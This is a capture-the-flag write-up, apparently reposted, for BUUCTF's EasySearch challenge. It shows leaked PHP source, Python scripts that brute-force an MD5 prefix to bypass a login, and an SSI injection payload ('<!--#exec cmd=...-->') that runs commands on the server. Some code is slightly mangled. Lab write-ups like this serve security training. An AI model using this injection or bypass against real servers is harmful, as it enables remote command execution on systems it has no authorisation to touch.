BUUCTF:[BJDCTF2020]EasySearch
Posted 末初mochu7
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF:[BJDCTF2020]EasySearch相关的知识,希望对你有一定的参考价值。
index.php.swp发现源码
<?php
ob_start();
function get_hash()
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6))
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
else
echo "<script>alert('[!] Failed')</script>";
else
***
***
?>
首先验证password,然后username的值可控,但是写入.shtml文件,无法控制这个$file_html,查阅.shtml文件
可以看到.shtml文件可以执行命令,格式:
<!--#exec cmd="id" -->
验证password脚本简单跑一下即可
import hashlib
chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
for c1 in chars:
for c2 in chars:
for c3 in chars:
for c4 in chars:
res = c1 + c2 + c3 + c4
md5_res = hashlib.md5(res.encode()).hexdigest()
if md5_res[0:6] == '6d0bc1':
print(' '.format(res, md5_res))
或者用数字更快
import hashlib
for n in range(10000000):
md5_n = hashlib.md5(str(n).encode()).hexdigest()
if md5_n[0:6] == '6d0bc1':
print(' '.format(n, md5_n))
PS C:\\Users\\Administrator\\Downloads> python .\\code.py
2020666 6d0bc1153791aa2b4e18b4f344f26ab4
2305004 6d0bc1ec71a9b814677b85e3ac9c3d40
9162671 6d0bc11ea877b37d694b38ba8a45b19c
RhPd 6d0bc1e4a7920842ccce734925903e17
payload
username=<!--#exec cmd="id" -->&password=RhPd
运行之后在响应头反馈了访问URL
访问即可发现成功执行
在当前目录的上一级发现flag
直接读取即可
以上是关于BUUCTF:[BJDCTF2020]EasySearch的主要内容,如果未能解决你的问题,请参考以下文章